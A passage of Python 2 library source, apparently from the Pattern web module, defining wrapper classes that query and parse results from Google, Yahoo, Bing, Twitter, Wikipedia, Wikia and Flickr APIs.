- linebreaks : the maximum amount of consecutive linebreaks,
- indentation : keep left line indentation (tabs and spaces)?
"""
if not keep.__contains__("script"):
html = strip_javascript(html)
if not keep.__contains__("style"):
html = strip_inline_css(html)
if not keep.__contains__("form"):
html = strip_forms(html)
if not keep.__contains__("comment") and \
not keep.__contains__("!--"):
html = strip_comments(html)
html = html.replace("\r", "\n")
html = strip_tags(html, exclude=keep, replace=replace)
html = decode_entities(html)
html = collapse_spaces(html, indentation)
html = collapse_tabs(html, indentation)
html = collapse_linebreaks(html, linebreaks)
html = html.strip()
return html
#### SEARCH ENGINE #################################################################################
SEARCH = "search" # Query for pages (i.e. links to websites).
IMAGE = "image" # Query for images.
NEWS = "news" # Query for news items.
TINY = "tiny" # Image size around 100x100.
SMALL = "small" # Image size around 200x200.
MEDIUM = "medium" # Image size around 500x500.
LARGE = "large" # Image size around 1000x1000.
RELEVANCY = "relevancy" # Sort results by most relevant.
LATEST = "latest" # Sort results by most recent.
class Result(dict):
def __init__(self, url):
""" An item in a list of results returned by SearchEngine.search().
All dictionary entries are available as unicode string attributes.
- url : the URL of the referred web content,
- title : the title of the content at the URL,
- text : the content text,
- language: the content language,
- author : for news items and images, the author,
- date : for news items, the publication date.
"""
dict.__init__(self)
self.url = url
@property
def description(self):
return self.text # Backwards compatibility.
def download(self, *args, **kwargs):
""" Download the content at the given URL.
By default it will be cached - see URL.download().
"""
return URL(self.url).download(*args, **kwargs)
def __getattr__(self, k):
return self.get(k, u"")
def __getitem__(self, k):
return self.get(k, u"")
def __setattr__(self, k, v):
dict.__setitem__(self, u(k), v is not None and u(v) or u"") # Store strings as unicode.
def __setitem__(self, k, v):
dict.__setitem__(self, u(k), v is not None and u(v) or u"")
def setdefault(self, k, v):
dict.setdefault(self, u(k), u(v))
def update(self, *args, **kwargs):
map = dict()
map.update(*args, **kwargs)
dict.update(self, [(u(k), u(v)) for k, v in map.items()])
def __repr__(self):
return "Result(url=%s)" % repr(self.url)
class Results(list):
def __init__(self, source=None, query=None, type=SEARCH, total=0):
""" A list of results returned from SearchEngine.search().
- source: the service that yields the results (e.g. GOOGLE, TWITTER).
- query : the query that yields the results.
- type : the query type (SEARCH, IMAGE, NEWS).
- total : the total result count.
This is not the length of the list, but the total number of matches for the given query.
"""
self.source = source
self.query = query
self.type = type
self.total = total
class SearchEngine:
def __init__(self, license=None, throttle=1.0, language=None):
""" A base class for a web service.
- license : license key for the API,
- throttle : delay between requests (avoid hammering the server).
Inherited by: Google, Yahoo, Bing, Twitter, Wikipedia, Flickr.
"""
self.license = license
self.throttle = throttle # Amount of sleep time after executing a query.
self.language = language # Result.language restriction (e.g., "en").
self.format = lambda x: x # Formatter applied to each attribute of each Result.
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
return Results(source=None, query=query, type=type)
class SearchEngineError(HTTPError):
pass
class SearchEngineTypeError(SearchEngineError):
pass # Raised when an unknown type is passed to SearchEngine.search().
class SearchEngineLimitError(SearchEngineError):
pass # Raised when the query limit for a license is reached.
#--- GOOGLE ----------------------------------------------------------------------------------------
# Google Custom Search is a paid service.
# https://code.google.com/apis/console/
# http://code.google.com/apis/customsearch/v1/overview.html
GOOGLE = "https://www.googleapis.com/customsearch/v1?"
GOOGLE_LICENSE = api.license["Google"]
GOOGLE_CUSTOM_SEARCH_ENGINE = "000579440470800426354:_4qo2s0ijsi"
# Search results can start with: "Jul 29, 2007 ...",
# which is the date of the page parsed by Google from the content.
RE_GOOGLE_DATE = re.compile("^([A-Z][a-z]{2} [0-9]{1,2}, [0-9]{4}) {0,1}...")
class Google(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or GOOGLE_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Google for the given query.
- type : SEARCH,
- start: maximum 100 results => start 1-10 with count=10,
- count: maximum 10,
There is a daily limit of 10,000 queries. Google Custom Search is a paid service.
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > (100 / count):
return Results(GOOGLE, query, type)
# 1) Create request URL.
url = URL(GOOGLE, query={
"key": self.license or GOOGLE_LICENSE,
"cx": GOOGLE_CUSTOM_SEARCH_ENGINE,
"q": query,
"start": 1 + (start-1) * count,
"num": min(count, 10),
"alt": "json"
})
# 2) Restrict language.
if self.language is not None:
url.query["lr"] = "lang_" + self.language
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
if data.get("error", {}).get("code") == 403:
raise SearchEngineLimitError
results = Results(GOOGLE, query, type)
results.total = int(data.get("queries", {}).get("request", [{}])[0].get("totalResults") or 0)
for x in data.get("items", []):
r = Result(url=None)
r.url = self.format(x.get("link"))
r.title = self.format(x.get("title"))
r.text = self.format(x.get("htmlSnippet").replace("<br> ","").replace("<b>...</b>", "..."))
r.language = self.language or ""
r.date = ""
if not r.date:
# Google Search results can start with a date (parsed from the content):
m = RE_GOOGLE_DATE.match(r.text)
if m:
r.date = m.group(1)
r.text = "..." + r.text[len(m.group(0)):]
results.append(r)
return results
def translate(self, string, input="en", output="fr", **kwargs):
""" Returns the translation of the given string in the desired output language.
Google Translate is a paid service, license without billing raises HTTP401Authentication.
"""
url = URL("https://www.googleapis.com/language/translate/v2?", method=GET, query={
"key": GOOGLE_LICENSE,
"q": string,
"source": input,
"target": output
})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(**kwargs)
except HTTP403Forbidden:
raise HTTP401Authentication, "Google translate API is a paid service"
data = json.loads(data)
data = data.get("data", {}).get("translations", [{}])[0].get("translatedText", "")
data = decode_entities(data)
return u(data)
def identify(self, string, **kwargs):
""" Returns a (language, confidence)-tuple for the given string.
Google Translate is a paid service, license without billing raises HTTP401Authentication.
"""
url = URL("https://www.googleapis.com/language/translate/v2/detect?", method=GET, query={
"key": GOOGLE_LICENSE,
"q": string[:1000]
})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(**kwargs)
except HTTP403Forbidden:
raise HTTP401Authentication, "Google translate API is a paid service"
data = json.loads(data)
data = data.get("data", {}).get("detections", [[{}]])[0][0]
data = u(data.get("language")), float(data.get("confidence"))
return data
#--- YAHOO -----------------------------------------------------------------------------------------
# Yahoo BOSS is a paid service.
# http://developer.yahoo.com/search/
YAHOO = "http://yboss.yahooapis.com/ysearch/"
YAHOO_LICENSE = api.license["Yahoo"]
class Yahoo(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or YAHOO_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Yahoo for the given query.
- type : SEARCH, IMAGE or NEWS,
- start: maximum 1000 results => start 1-100 with count=10, 1000/count,
- count: maximum 50, or 35 for images.
There is no daily limit, however Yahoo BOSS is a paid service.
"""
if type not in (SEARCH, IMAGE, NEWS):
raise SearchEngineTypeError
if type == SEARCH:
url = YAHOO + "web"
if type == IMAGE:
url = YAHOO + "images"
if type == NEWS:
url = YAHOO + "news"
if not query or count < 1 or start < 1 or start > 1000 / count:
return Results(YAHOO, query, type)
# 1) Create request URL.
url = URL(url, method=GET, query={
"q": encode_url(query),
"start": 1 + (start-1) * count,
"count": min(count, type==IMAGE and 35 or 50),
"format": "json"
})
# 2) Restrict language.
if self.language is not None:
market = locale.market(self.language)
if market:
url.query["market"] = market.lower()
# 3) BOSS OAuth authentication.
url.query.update({
"oauth_version": "1.0",
"oauth_nonce": oauth.nonce(),
"oauth_timestamp": oauth.timestamp(),
"oauth_consumer_key": self.license[0],
"oauth_signature_method": "HMAC-SHA1"
})
url.query["oauth_signature"] = oauth.sign(url.string.split("?")[0], url.query, method=GET, secret=self.license[1])
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(cached=cached, **kwargs)
except HTTP401Authentication:
raise HTTP401Authentication, "Yahoo %s API is a paid service" % type
except HTTP403Forbidden:
raise SearchEngineLimitError
data = json.loads(data)
data = data.get("bossresponse") or {}
data = data.get({SEARCH:"web", IMAGE:"images", NEWS:"news"}[type], {})
results = Results(YAHOO, query, type)
results.total = int(data.get("totalresults") or 0)
for x in data.get("results", []):
r = Result(url=None)
r.url = self.format(x.get("url", x.get("clickurl")))
r.title = self.format(x.get("title"))
r.text = self.format(x.get("abstract"))
r.date = self.format(x.get("date"))
r.author = self.format(x.get("source"))
r.language = self.format(x.get("language") and \
x.get("language").split(" ")[0] or self.language or "")
results.append(r)
return results
#--- BING ------------------------------------------------------------------------------------------
# https://datamarket.azure.com/dataset/5BA839F1-12CE-4CCE-BF57-A49D98D29A44
# https://datamarket.azure.com/account/info
BING = "https://api.datamarket.azure.com/Bing/Search/"
BING_LICENSE = api.license["Bing"]
class Bing(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or BING_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
"""" Returns a list of results from Bing for the given query.
- type : SEARCH, IMAGE or NEWS,
- start: maximum 1000 results => start 1-100 with count=10, 1000/count,
- count: maximum 50, or 15 for news,
- size : for images, either SMALL, MEDIUM or LARGE.
There is no daily query limit.
"""
if type not in (SEARCH, IMAGE, NEWS):
raise SearchEngineTypeError
if type == SEARCH:
src = "Web"
if type == IMAGE:
src = "Image"
if type == NEWS:
src = "News"
if not query or count < 1 or start < 1 or start > 1000 / count:
return Results(BING + src + "?", query, type)
# 1) Construct request URL.
url = URL(BING + "Composite", method=GET, query={
"Sources": "'" + src.lower() + "'",
"Query": "'" + query + "'",
"$skip": 1 + (start-1) * count,
"$top": min(count, type==NEWS and 15 or 50),
"$format": "json",
})
# 2) Restrict image size.
if size in (TINY, SMALL, MEDIUM, LARGE):
url.query["ImageFilters"] = {
TINY: "'Size:Small'",
SMALL: "'Size:Small'",
MEDIUM: "'Size:Medium'",
LARGE: "'Size:Large'" }[size]
# 3) Restrict language.
if type in (SEARCH, IMAGE) and self.language is not None:
url.query["Query"] = url.query["Query"][:-1] + " language: %s'" % self.language
#if self.language is not None:
# market = locale.market(self.language)
# if market:
# url.query["market"] = market
# 4) Parse JSON response.
kwargs["authentication"] = ("", self.license)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(cached=cached, **kwargs)
except HTTP401Authentication:
raise HTTP401Authentication, "Bing %s API is a paid service" % type
data = json.loads(data)
data = data.get("d", {})
data = data.get("results", [{}])[0]
results = Results(BING, query, type)
results.total = int(data.get(src+"Total", 0))
for x in data.get(src, []):
r = Result(url=None)
r.url = self.format(x.get("MediaUrl", x.get("Url")))
r.title = self.format(x.get("Title"))
r.text = self.format(x.get("Description", x.get("Snippet")))
r.language = self.language or ""
r.date = self.format(x.get("DateTime", x.get("Date")))
r.author = self.format(x.get("Source"))
results.append(r)
return results
#--- TWITTER ---------------------------------------------------------------------------------------
# http://apiwiki.twitter.com/
TWITTER = "http://search.twitter.com/"
TWITTER_STREAM = "https://stream.twitter.com/1/statuses/filter.json"
TWITTER_STATUS = "https://twitter.com/%s/status/%s"
TWITTER_LICENSE = api.license["Twitter"]
TWITTER_HASHTAG = re.compile(r"(\s|^)(#[a-z0-9_\-]+)", re.I) # Word starts with "#".
TWITTER_RETWEET = re.compile(r"(\s|^RT )(@[a-z0-9_\-]+)", re.I) # Word starts with "RT @".
class Twitter(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or TWITTER_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=False, **kwargs):
""" Returns a list of results from Twitter for the given query.
- type : SEARCH or TRENDS,
- start: maximum 1500 results (10 for trends) => start 1-15 with count=100, 1500/count,
- count: maximum 100, or 10 for trends.
There is an hourly limit of 150+ queries (actual amount undisclosed).
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > 1500 / count:
return Results(TWITTER, query, type)
# 1) Construct request URL.
url = URL(TWITTER + "search.json?", method=GET)
url.query = {
"q": query,
"page": start,
"rpp": min(count, 100)
}
if "geo" in kwargs:
# Filter by location with geo=(latitude, longitude, radius).
# It can also be a (latitude, longitude)-tuple with default radius "10km".
url.query["geocode"] = ",".join((map(str, kwargs.pop("geo")) + ["10km"])[:3])
# 2) Restrict language.
url.query["lang"] = self.language or ""
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(cached=cached, **kwargs)
except HTTP420Error:
raise SearchEngineLimitError
data = json.loads(data)
results = Results(TWITTER, query, type)
results.total = None
for x in data.get("results", data.get("trends", [])):
r = Result(url=None)
r.url = self.format(TWITTER_STATUS % (x.get("from_user"), x.get("id_str")))
r.text = self.format(x.get("text"))
r.date = self.format(x.get("created_at", data.get("as_of")))
r.author = self.format(x.get("from_user"))
r.profile = self.format(x.get("profile_image_url")) # Profile picture URL.
r.language = self.format(x.get("iso_language_code"))
results.append(r)
return results
def trends(self, **kwargs):
""" Returns a list with 10 trending topics on Twitter.
"""
url = URL("https://api.twitter.com/1/trends/1.json")
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(**kwargs)
data = json.loads(data)
return [u(x.get("name")) for x in data[0].get("trends", [])]
def stream(self, query):
""" Returns a live stream of Result objects for the given query.
"""
url = URL(TWITTER_STREAM)
url.query.update({
"track": query,
"oauth_version": "1.0",
"oauth_nonce": oauth.nonce(),
"oauth_timestamp": oauth.timestamp(),
"oauth_consumer_key": self.license[0],
"oauth_token": self.license[2][0],
"oauth_signature_method": "HMAC-SHA1"
})
url.query["oauth_signature"] = oauth.sign(url.string.split("?")[0], url.query, GET,
self.license[1],
self.license[2][1])
return TwitterStream(url, delimiter="\n", format=self.format)
class TwitterStream(Stream):
def __init__(self, socket, delimiter="\n", format=lambda s: s):
Stream.__init__(self, socket, delimiter)
self.format = format
def parse(self, data):
""" TwitterStream.queue will populate with Result objects as
TwitterStream.update() is called iteratively.
"""
x = json.loads(data)
r = Result(url=None)
r.url = self.format(TWITTER_STATUS % (x.get("user", {}).get("screen_name"), x.get("id_str")))
r.text = self.format(x.get("text"))
r.date = self.format(x.get("created_at"))
r.author = self.format(x.get("user", {}).get("screen_name"))
r.profile = self.format(x.get("profile_image_url"))
r.language = self.format(x.get("iso_language_code"))
return r
def author(name):
""" Returns a Twitter query-by-author-name that can be passed to Twitter.search().
For example: Twitter().search(author("tom_de_smedt"))
"""
return "from:%s" % name
def hashtags(string):
""" Returns a list of hashtags (words starting with a #hash) from a tweet.
"""
return [b for a, b in TWITTER_HASHTAG.findall(string)]
def retweets(string):
""" Returns a list of retweets (words starting with a RT @author) from a tweet.
"""
return [b for a, b in TWITTER_RETWEET.findall(string)]
#stream = Twitter().stream("cat")
#for i in range(10):
# stream.update()
# for tweet in reversed(stream):
# print tweet.text
# print tweet.url
# print
#stream.clear()
#--- MEDIAWIKI -------------------------------------------------------------------------------------
# http://en.wikipedia.org/w/api.php
WIKIA = "http://wikia.com"
WIKIPEDIA = "http://wikipedia.com"
WIKIPEDIA_LICENSE = api.license["Wikipedia"]
MEDIAWIKI_LICENSE = None
MEDIAWIKI = "http://{SUBDOMAIN}.{DOMAIN}{API}"
# Pattern for meta links (e.g. Special:RecentChanges).
# http://en.wikipedia.org/wiki/Main_namespace
MEDIAWIKI_NAMESPACE = ["Main", "User", "Wikipedia", "File", "MediaWiki", "Template", "Help", "Category", "Portal", "Book"]
MEDIAWIKI_NAMESPACE += [s+" talk" for s in MEDIAWIKI_NAMESPACE] + ["Talk", "Special", "Media"]
MEDIAWIKI_NAMESPACE += ["WP", "WT", "MOS", "C", "CAT", "Cat", "P", "T", "H", "MP", "MoS", "Mos"]
_mediawiki_namespace = re.compile(r"^"+"|".join(MEDIAWIKI_NAMESPACE)+":", re.I)
# Pattern to identify disambiguation pages.
MEDIAWIKI_DISAMBIGUATION = "<a href=\"/wiki/Help:Disambiguation\" title=\"Help:Disambiguation\">disambiguation</a> page"
# Pattern to identify references, e.g. [12]
MEDIAWIKI_REFERENCE = r"\s*\[[0-9]{1,3}\]"
class MediaWiki(SearchEngine):
def __init__(self, license=None, throttle=5.0, language="en"):
SearchEngine.__init__(self, license or MEDIAWIKI_LICENSE, throttle, language)
@property
def _url(self):
# Must be overridden in a subclass; see Wikia and Wikipedia.
return None
@property
def MediaWikiArticle(self):
return MediaWikiArticle
@property
def MediaWikiSection(self):
return MediaWikiSection
@property
def MediaWikiTable(self):
return MediaWikiTable
def __iter__(self):
return self.all()
def all(self, **kwargs):
""" Returns an iterator over all MediaWikiArticle objects.
Optional parameters can include those passed to
MediaWiki.list(), MediaWiki.search() and URL.download().
"""
for title in self.list(**kwargs):
yield self.search(title, **kwargs)
articles = all
def list(self, namespace=0, start=None, count=100, cached=True, **kwargs):
""" Returns an iterator over all article titles (for a given namespace id).
"""
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
# Fetch article titles (default) or a custom id.
id = kwargs.pop("_id", "title")
# Loop endlessly (= until the last request no longer yields an "apcontinue").
# See: http://www.mediawiki.org/wiki/API:Allpages
while start != -1:
url = URL(self._url, method=GET, query={
"action": "query",
"list": "allpages",
"apnamespace": namespace,
"apfrom": start or "",
"aplimit": min(count, 500),
"apfilterredir": "nonredirects",
"format": "json"
})
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
for x in data.get("query", {}).get("allpages", {}):
if x.get(id):
yield x[id]
start = data.get("query-continue", {}).get("allpages", {})
start = start.get("apcontinue", start.get("apfrom", -1))
raise StopIteration
def search(self, query, type=SEARCH, start=1, count=1, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a MediaWikiArticle for the given query.
The query is case-sensitive, for example on Wikipedia:
- "tiger" = Panthera tigris,
- "TIGER" = Topologically Integrated Geographic Encoding and Referencing.
"""
if type != SEARCH:
raise SearchEngineTypeError
if count < 1:
return None
# 1) Construct request URL (e.g., Wikipedia for a given language).
url = URL(self._url, method=GET, query={
"action": "parse",
"page": query.replace(" ","_"),
"redirects": 1,
"format": "json"
})
# 2) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("timeout", 30) # Parsing the article takes some time.
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
data = data.get("parse", {})
a = self._parse_article(data, query=query)
a = self._parse_article_sections(a, data)
a = self._parse_article_section_structure(a)
if not a.html or "id=\"noarticletext\"" in a.html:
return None
return a
def _parse_article(self, data, **kwargs):
return self.MediaWikiArticle(
title = plaintext(data.get("displaytitle", data.get("title", ""))),
source = data.get("text", {}).get("*", ""),
disambiguation = data.get("text", {}).get("*", "").find(MEDIAWIKI_DISAMBIGUATION) >= 0,
links = [x["*"] for x in data.get("links", []) if not _mediawiki_namespace.match(x["*"])],
categories = [x["*"] for x in data.get("categories", [])],
external = [x for x in data.get("externallinks", [])],
media = [x for x in data.get("images", [])],
languages = dict([(x["lang"], x["*"]) for x in data.get("langlinks", [])]),
language = self.language,
parser = self, **kwargs)
def _parse_article_sections(self, article, data):
# If "References" is a section in the article,
# the HTML will contain a marker <h*><span class="mw-headline" id="References">.
# http://en.wikipedia.org/wiki/Section_editing
t = article.title
d = 0
i = 0
for x in data.get("sections", {}):
a = x.get("anchor")
if a:
p = r"<h.>\s*.*?\s*<span class=\"mw-headline\" id=\"%s\">" % a
p = re.compile(p)
m = p.search(article.source, i)
if m:
j = m.start()
article.sections.append(self.MediaWikiSection(article,
title = t,
start = i,
stop = j,
level = d))
t = x.get("line", "")
d = int(x.get("level", 2)) - 1
i = j
return article
def _parse_article_section_structure(self, article):
# Sections with higher level are children of previous sections with lower level.
for i, s2 in enumerate(article.sections):
for s1 in reversed(article.sections[:i]):
if s1.level < s2.level:
s2.parent = s1
s1.children.append(s2)
break
return article
class MediaWikiArticle:
def __init__(self, title=u"", source=u"", links=[], categories=[], languages={}, disambiguation=False, **kwargs):
""" A MediaWiki article returned from MediaWiki.search().
MediaWikiArticle.string contains the HTML content.
"""
self.title = title # Article title.
self.source = source # Article HTML content.
self.sections = [] # Article sections.
self.links = links # List of titles of linked articles.
self.categories = categories # List of categories. As links, prepend "Category:".
self.external = [] # List of external links.
self.media = [] # List of linked media (images, sounds, ...)
self.disambiguation = disambiguation # True when the article is a disambiguation page.
self.languages = languages # Dictionary of (language, article)-items, e.g. Cat => ("nl", "Kat")
self.language = kwargs.get("language", "en")
self.parser = kwargs.get("parser", MediaWiki())
for k, v in kwargs.items():
setattr(self, k, v)
def _plaintext(self, string, **kwargs):
""" Strips HTML tags, whitespace and wiki markup from the HTML source, including:
metadata, info box, table of contents, annotations, thumbnails, disambiguation link.
This is called internally from MediaWikiArticle.string.
"""
s = string
s = strip_between("<table class=\"metadata", "</table>", s) # Metadata.
s = strip_between("<table id=\"toc", "</table>", s) # Table of contents.
s = strip_between("<table class=\"infobox", "</table>", s) # Infobox.
s = strip_between("<table class=\"wikitable", "</table>", s) # Table.
s = strip_element(s, "table", "class=\"navbox") # Navbox.
s = strip_between("<div id=\"annotation", "</div>", s) # Annotations.
s = strip_between("<div class=\"dablink", "</div>", s) # Disambiguation message.
s = strip_between("<div class=\"magnify", "</div>", s) # Thumbnails.
s = strip_between("<div class=\"thumbcaption", "</div>", s) # Thumbnail captions.
s = re.sub(r"<img class=\"tex\".*?/>", "[math]", s) # LaTex math images.
s = plaintext(s, **kwargs)
s = re.sub(r"\[edit\]\s*", "", s) # [edit] is language dependent (e.g. nl => "[bewerken]")
s = s.replace("[", " [").replace(" [", " [") # Space before inline references.
return s
def plaintext(self, **kwargs):
return self._plaintext(self.source, **kwargs)
@property
def html(self):
return self.source
@property
def string(self):
return self.plaintext()
def __repr__(self):
return "MediaWikiArticle(title=%s)" % repr(self.title)
class MediaWikiSection:
def __init__(self, article, title=u"", start=0, stop=0, level=1):
""" A (nested) section in the content of a MediaWikiArticle.
"""
self.article = article # MediaWikiArticle the section is part of.
self.parent = None # MediaWikiSection the section is part of.
self.children = [] # MediaWikiSections belonging to this section.
self.title = title # Section title.
self._start = start # Section start index in MediaWikiArticle.string.
self._stop = stop # Section stop index in MediaWikiArticle.string.
self._level = level # Section depth (main title + intro = level 0).
self._tables = None
def plaintext(self, **kwargs):
return self.article._plaintext(self.source, **kwargs)
@property
def source(self):
return self.article.source[self._start:self._stop]
@property
def html(self):
return self.source
@property
def string(self):
return self.plaintext()
@property
def content(self):
# ArticleSection.string, minus the title.
s = self.plaintext()
if s == self.title or s.startswith(self.title+"\n"):
return s[len(self.title):].lstrip()
return s
@property
def tables(self):
""" Yields a list of MediaWikiTable objects in the section.
"""
if self._tables is None:
self._tables = []
b = "<table class=\"wikitable\"", "</table>"
p = self.article._plaintext
f = find_between
for s in f(b[0], b[1], self.source):
t = self.article.parser.MediaWikiTable(self,
title = p((f(r"<caption.*?>", "</caption>", s) + [""])[0]),
source = b[0] + s + b[1]
)
for i, row in enumerate(f(r"<tr", "</tr>", s)):
# 1) Parse <td> and <th> content and format it as plain text.
# 2) Parse <td colspan=""> attribute, duplicate spanning cells.
# 3) For <th> in the first row, update MediaWikiTable.headers.
r1 = f(r"<t[d|h]", r"</t[d|h]>", row)
r1 = (((f(r'colspan="', r'"', v)+[1])[0], v[v.find(">")+1:]) for v in r1)
r1 = ((int(n), v) for n, v in r1)
r2 = []; [[r2.append(p(v)) for j in range(n)] for n, v in r1]
if i == 0 and "</th>" in row:
t.headers = r2
else:
t.rows.append(r2)
self._tables.append(t)
return self._tables
@property
def level(self):
return self._level
depth = level
def __repr__(self):
return "MediaWikiSection(title='%s')" % bytestring(self.title)
class MediaWikiTable:
def __init__(self, section, title=u"", headers=[], rows=[], source=u""):
""" A <table class="wikitable> in a MediaWikiSection.
"""
self.section = section # MediaWikiSection the table is part of.
self.source = source # Table HTML.
self.title = title # Table title.
self.headers = headers # List of table headers.
self.rows = rows # List of table rows, each a list of cells.
@property
def html(self):
return self.source
def __repr__(self):
return "MediaWikiTable(title='%s')" % bytestring(self.title)
#--- MEDIAWIKI: WIKIPEDIA --------------------------------------------------------------------------
class Wikipedia(MediaWiki):
def __init__(self, license=None, throttle=5.0, language="en"):
""" Mediawiki search engine for http://[language].wikipedia.org.
"""
SearchEngine.__init__(self, license or WIKIPEDIA_LICENSE, throttle, language)
self._subdomain = language
@property
def _url(self):
s = MEDIAWIKI
s = s.replace("{SUBDOMAIN}", self._subdomain)
s = s.replace("{DOMAIN}", "wikipedia.org")
s = s.replace("{API}", '/w/api.php')
return s
@property
def MediaWikiArticle(self):
return WikipediaArticle
@property
def MediaWikiSection(self):
return WikipediaSection
@property
def MediaWikiTable(self):
return WikipediaTable
class WikipediaArticle(MediaWikiArticle):
def download(self, media, **kwargs):
""" Downloads an item from MediaWikiArticle.media and returns the content.
Note: images on Wikipedia can be quite large, and this method uses screen-scraping,
so Wikipedia might not like it that you download media in this way.
To save the media in a file:
data = article.download(media)
open(filename+extension(media),"w").write(data)
"""
url = "http://%s.wikipedia.org/wiki/File:%s" % (self.__dict__.get("language", "en"), media)
if url not in cache:
time.sleep(1)
data = URL(url).download(**kwargs)
data = re.search(r"upload.wikimedia.org/.*?/%s" % media, data)
data = data and URL("http://" + data.group(0)).download(**kwargs) or None
return data
def __repr__(self):
return "WikipediaArticle(title=%s)" % repr(self.title)
class WikipediaSection(MediaWikiSection):
def __repr__(self):
return "WikipediaSection(title='%s')" % bytestring(self.title)
class WikipediaTable(MediaWikiTable):
def __repr__(self):
return "WikipediaTable(title='%s')" % bytestring(self.title)
#article = Wikipedia().search("cat")
#for section in article.sections:
# print " "*(section.level-1) + section.title
#if article.media:
# data = article.download(article.media[2])
# f = open(article.media[2], "w")
# f.write(data)
# f.close()
#
#article = Wikipedia(language="nl").search("borrelnootje")
#print article.string
#--- MEDIAWIKI: WIKIA ------------------------------------------------------------------------------
class Wikia(MediaWiki):
def __init__(self, domain="www", license=None, throttle=5.0, language="en"):
""" Mediawiki search engine for http://[domain].wikia.com.
"""
SearchEngine.__init__(self, license or MEDIAWIKI_LICENSE, throttle, language)
self._subdomain = domain
@property
def _url(self):
s = MEDIAWIKI
s = s.replace("{SUBDOMAIN}", self._subdomain)
s = s.replace("{DOMAIN}", "wikia.com")
s = s.replace("{API}", '/api.php')
return s
@property
def MediaWikiArticle(self):
return WikiaArticle
@property
def MediaWikiSection(self):
return WikiaSection
@property
def MediaWikiTable(self):
return WikiaTable
def all(self, **kwargs):
if kwargs.pop("batch", True):
# We can take advantage of Wikia's search API to reduce bandwith.
# Instead of executing a query to retrieve each article,
# we query for a batch of (10) articles.
iterator = self.list(_id="pageid", **kwargs)
while True:
batch, done = [], False
try:
for i in range(10): batch.append(iterator.next())
except StopIteration:
done = True # No more articles, finish batch and raise StopIteration.
url = URL(self._url.replace("api.php", "wikia.php"), method=GET, query={
"controller": "WikiaSearch",
"method": "getPages",
"ids": '|'.join(str(id) for id in batch),
"format": "json"
})
kwargs.setdefault("unicode", True)
kwargs.setdefault("cached", True)
kwargs["timeout"] = 10 * (1 + len(batch))
data = url.download(**kwargs)
data = json.loads(data)
for x in (data or {}).get("pages", {}).values():
yield WikiaArticle(title=x.get("title", ""), source=x.get("html", ""))
if done:
raise StopIteration
for title in self.list(**kwargs):
yield self.search(title, **kwargs)
class WikiaArticle(MediaWikiArticle):
def __repr__(self):
return "WikiaArticle(title=%s)" % repr(self.title)
class WikiaSection(MediaWikiSection):
def __repr__(self):
return "WikiaSection(title='%s')" % bytestring(self.title)
class WikiaTable(MediaWikiTable):
def __repr__(self):
return "WikiaTable(title='%s')" % bytestring(self.title)
#--- FLICKR ----------------------------------------------------------------------------------------
# http://www.flickr.com/services/api/
FLICKR = "http://api.flickr.com/services/rest/"
FLICKR_LICENSE = api.license["Flickr"]
INTERESTING = "interesting"
class Flickr(SearchEngine):
def __init__(self, license=None, throttle=5.0, language=None):
SearchEngine.__init__(self, license or FLICKR_LICENSE, throttle, language)
def search(self, query, type=IMAGE, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Flickr for the given query.
Retrieving the URL of a result (i.e. image) requires an additional query.
- type : SEARCH, IMAGE,
- start: maximum undefined,
- count: maximum 500,
- sort : RELEVANCY, LATEST or INTERESTING.
There is no daily limit.
"""
if type not in (SEARCH, IMAGE):
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > 500/count:
return Results(FLICKR, query, IMAGE)
# 1) Construct request URL.
url = FLICKR+"?"
url = URL(url, method=GET, query={
"api_key": self.license or "",
"method": "flickr.photos.search",
"text": query.replace(" ", "_"),
"page": start,
"per_page": min(count, 500),
"sort": { RELEVANCY: "relevance",
LATEST: "date-posted-desc",
INTERESTING: "interestingness-desc" }.get(sort)
})
if kwargs.get("copyright", True) is False:
# With copyright=False, only returns Public Domain and Creative Commons images.
# http://www.flickr.com/services/api/flickr.photos.licenses.getInfo.html
# 5: "Attribution-ShareAlike License"
# 7: "No known copyright restriction"
url.query["license"] = "5,7"
# 2) Parse XML response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = xml.dom.minidom.parseString(bytestring(data))
results = Results(FLICKR, query, IMAGE)
